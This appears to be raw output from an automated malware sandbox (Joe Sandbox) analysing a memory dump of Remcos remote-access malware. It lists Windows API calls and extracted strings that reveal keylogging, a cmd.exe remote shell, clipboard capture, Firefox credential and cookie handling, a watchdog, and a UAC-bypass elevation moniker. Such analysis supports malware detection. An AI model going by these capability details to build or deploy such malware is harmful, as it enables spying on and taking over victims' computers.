                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044AD29
                    • __alloca_probe_16.LIBCMT ref: 0044ADC0
                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
                    • __freea.LIBCMT ref: 0044AE30
                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                    • __freea.LIBCMT ref: 0044AE39
                    • __freea.LIBCMT ref: 0044AE5E
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                    • String ID:

                    APIs
                    • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C44D
                    • CloseHandle.KERNEL32(00000000), ref: 0041C459
                    • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C46A
                    • CloseHandle.KERNEL32(00000000), ref: 0041C477
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseHandle$CreatePointerWrite
                    • String ID: hpF

                    APIs
                      • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                      • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                      • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32 ref: 004135E7
                      • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
                    • StrToIntA.SHLWAPI(00000000), ref: 0041B33C
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCurrentOpenProcessQueryValue
                    • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion

                    APIs
                    • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6AB
                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                    • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                    • CloseHandle.KERNEL32(00000000), ref: 0040A6EE
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseCreateHandleSizeSleep
                    • String ID: XQG
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CountEventTick
                    • String ID: !D@$NG
                    APIs
                    • CreateThread.KERNEL32(00000000,00000000,0040A27D,?,00000000,00000000), ref: 0040A1FE
                    • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040A20E
                    • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040A21A
                      • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                      • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateThread$LocalTimewsprintf
                    • String ID: Offline Keylogger Started
                    APIs
                    • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404F81
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404FCD
                    • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                    Strings
                    • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Create$EventLocalThreadTime
                    • String ID: KeepAlive | Enabled | Timeout:
                    APIs
                    • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                    • RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000), ref: 004137A6
                    • RegCloseKey.KERNEL32(?), ref: 004137B1
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCreateValue
                    • String ID: pth_unenc
                    APIs
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                    • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DD2
                    • CloseHandle.KERNEL32(?), ref: 00404DDB
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Create$CloseEventHandleObjectSingleThreadWait
                    • String ID:
                    APIs
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
                    • GetLastError.KERNEL32(?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: LibraryLoad$ErrorLast
                    • String ID:
                    APIs
                    • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                    • GetLastError.KERNEL32 ref: 0040D083
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateErrorLastMutex
                    • String ID: SG
                    APIs
                    • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                    • RegQueryValueExA.KERNEL32 ref: 004135E7
                    • RegCloseKey.KERNEL32(?), ref: 004135F2
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID:
                    APIs
                    • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 00413714
                    • RegQueryValueExA.KERNEL32 ref: 0041372D
                    • RegCloseKey.KERNEL32(00000000), ref: 00413738
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID:
                    APIs
                    • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
                    • RegQueryValueExA.KERNEL32 ref: 00413587
                    • RegCloseKey.KERNEL32(?), ref: 00413592
                    • API ID: CloseOpenQueryValue
                    APIs
                    • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413516
                    • RegQueryValueExA.KERNEL32 ref: 0041352A
                    • RegCloseKey.KERNEL32(?), ref: 00413535
                    • API ID: CloseOpenQueryValue
                    APIs
                    • RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                    • RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
                    • RegCloseKey.KERNEL32(004660A4), ref: 004138AB
                    • API ID: CloseCreateValue
                    APIs
                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EDE9
                    • API ID: Info
                    APIs
                    • API ID: _wcslen
                    • String ID: pQG
                    APIs
                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 00448C24
                    • API ID: String
                    • String ID: LCMapStringEx
                    APIs
                    • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044BF4F,-00000020,00000FA0,00000000,00467378,00467378), ref: 00448ACF
                    Strings
                    • InitializeCriticalSectionEx, xrefs: 00448A9F
                    • API ID: CountCriticalInitializeSectionSpin
                    • String ID: InitializeCriticalSectionEx
                    APIs
                    • API ID: Alloc
                    • String ID: FlsAlloc
                    APIs
                    • try_get_function.LIBVCRUNTIME ref: 00438DA9
                    • API ID: try_get_function
                    • String ID: FlsAlloc
                    APIs
                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B7CA
                    • API ID: GlobalMemoryStatus
                    • String ID: @
                    APIs
                      • Part of subcall function 0044ECEC: GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044EFBA,?,00000000), ref: 0044F18D
                    • GetCPInfo.KERNEL32(00000000,0044EFBA,?,?,?,0044EFBA,?,00000000), ref: 0044F1A0
                    • API ID: CodeInfoPageValid
                    APIs
                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                      • Part of subcall function 0044F077: _abort.LIBCMT ref: 0044F0A9
                      • Part of subcall function 0044F077: _free.LIBCMT ref: 0044F0DD
                      • Part of subcall function 0044ECEC: GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                    • _free.LIBCMT ref: 0044EFD0
                    • _free.LIBCMT ref: 0044F006
                    • API ID: _free$ErrorLast_abort
                    APIs
                    • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7,00000000), ref: 0044852A
                    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00448537
                    • API ID: AddressProc__crt_fast_encode_pointer
                    APIs
                    • _free.LIBCMT ref: 004461A6
                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                    • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?,0000000F,00000000,00432F02,00000000,0000000F,0042F90C,?,?,004319B3,?,?,00000000), ref: 004461E2
                    • API ID: AllocateHeap$_free
                    APIs
                    • socket.WS2_32(?,00000001,00000006), ref: 00404852
                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                      • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                    • API ID: CreateEventStartupsocket
                    APIs
                    • API ID: Window$ForegroundText
                    APIs
                    • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,004750E4,00000000,00415188,00000000,00000001), ref: 00414F0B
                    • WSASetLastError.WS2_32(00000000), ref: 00414F10
                      • Part of subcall function 00414D86: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                      • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E17
                      • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                      • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                      • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E76
                      • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                      • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                      • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                    • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                    APIs
                      • Part of subcall function 00438D94: try_get_function.LIBVCRUNTIME ref: 00438DA9
                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40A
                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A415
                    • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                    APIs
                    • API ID: __alldvrm
                    APIs
                    • RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                    • API ID: AllocateHeap
                    APIs
                    • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                    • API ID: Startup
                    APIs
                    • API ID: send
                    APIs
                    • API ID: recv
                    APIs
                    • SetEvent.KERNEL32(?,?), ref: 00407CB9
                    • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
                    • DeleteFileW.KERNEL32(00000000), ref: 00407DA9
                      • Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                      • Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                      • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                      • Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                      • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                      • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                      • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
                    • GetLogicalDriveStringsA.KERNEL32 ref: 00408278
                    • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
                    • DeleteFileA.KERNEL32(?), ref: 00408652
                      • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
                      • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                      • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                      • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                    • Sleep.KERNEL32(000007D0), ref: 004086F8
                    • StrToIntA.SHLWAPI(00000000), ref: 0040873A
                      • Part of subcall function 0041C9E2: SystemParametersInfoW.USER32 ref: 0041CAD7
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                    • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                    APIs
                    • __Init_thread_footer.LIBCMT ref: 004056E6
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    • __Init_thread_footer.LIBCMT ref: 00405723
                    • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                    • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                    • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                    • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                    • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                    • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90), ref: 004059E4
                    • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                    • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                    • CloseHandle.KERNEL32 ref: 00405A23
                    • CloseHandle.KERNEL32 ref: 00405A2B
                    • CloseHandle.KERNEL32 ref: 00405A3D
                    • CloseHandle.KERNEL32 ref: 00405A45
                    Similarity
                    • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                    • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                    APIs
                    • GetCurrentProcessId.KERNEL32 ref: 00412106
                      • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                      • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
                      • Part of subcall function 00413877: RegCloseKey.KERNEL32(004660A4), ref: 004138AB
                    • OpenMutexA.KERNEL32 ref: 00412146
                    • CloseHandle.KERNEL32(00000000), ref: 00412155
                    • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
                    • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                    Similarity
                    • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                    • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                    APIs
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
                    • FindClose.KERNEL32(00000000), ref: 0040BBC9
                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
                    • FindClose.KERNEL32(00000000), ref: 0040BD12
                    Similarity
                    • API ID: Find$CloseFile$FirstNext
                    • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                    APIs
                    • OpenClipboard.USER32 ref: 004168C2
                    • EmptyClipboard.USER32 ref: 004168D0
                    • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                    • GlobalLock.KERNEL32 ref: 004168F9
                    • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                    • SetClipboardData.USER32 ref: 00416938
                    • CloseClipboard.USER32 ref: 00416955
                    • OpenClipboard.USER32 ref: 0041695C
                    • GetClipboardData.USER32 ref: 0041696C
                    • GlobalLock.KERNEL32 ref: 00416975
                    • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                    • CloseClipboard.USER32 ref: 00416984
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    Similarity
                    • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                    • String ID: !D@
                    APIs
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
                    • FindClose.KERNEL32(00000000), ref: 0040BDC9
                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
                    • FindClose.KERNEL32(00000000), ref: 0040BEAF
                    • FindClose.KERNEL32(00000000), ref: 0040BED0
                    Similarity
                    • API ID: Find$Close$File$FirstNext
                    • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                    APIs
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                    • CloseHandle.KERNEL32(00000000), ref: 0040F563
                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                    • CloseHandle.KERNEL32(00000000), ref: 0040F66E
                    Similarity
                    • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                    • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                    Strings
                    Similarity
                    • API ID:
                    • String ID: 0$1$2$3$4$5$6$7$VG
                    APIs
                    • _wcslen.LIBCMT ref: 00407521
                    • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                    Similarity
                    • API ID: Object_wcslen
                    • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                    APIs
                    • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                    • GetLastError.KERNEL32 ref: 0041A7BB
                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                    Similarity
                    • API ID: EnumServicesStatus$ErrorLastManagerOpen
                    • String ID:
                    APIs
                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                      • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
                    • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                    • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                    • GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                    • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED
                    Similarity
                    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                    • String ID: lJD$lJD$lJD
                    APIs
                    • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                    • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                    • FindClose.KERNEL32(00000000), ref: 0040C47D
                    • FindClose.KERNEL32(00000000), ref: 0040C4A8
                    Similarity
                    • API ID: Find$CloseFile$FirstNext
                    • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                    APIs
                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C38E
                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C39B
                      • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                    • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3BC
                    • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                    • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                    • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3E2
                    Similarity
                    • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                    • String ID:
                    APIs
                    • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
                    • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                      • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                    Similarity
                    • API ID: File$Find$CreateFirstNext
                    • String ID: 8SG$PXG$PXG$NG$PG
                    APIs
                    Similarity
                    • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                    • String ID:
                    APIs
                    • RegCreateKeyExW.ADVAPI32(00000000), ref: 0041409D
                    • RegCloseKey.ADVAPI32(?), ref: 004140A9
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    • LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 0041426A
                    • GetProcAddress.KERNEL32(00000000), ref: 00414271
                    Similarity
                    • API ID: AddressCloseCreateLibraryLoadProcsend
                    • String ID: SHDeleteKeyW$Shlwapi.dll
                    APIs
                    • _free.LIBCMT ref: 00449212
                    • _free.LIBCMT ref: 00449236
                    • _free.LIBCMT ref: 004493BD
                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                    • _free.LIBCMT ref: 00449589
                    Similarity
                    • API ID: _free$ByteCharMultiWide$InformationTimeZone
                    • String ID:
                    APIs
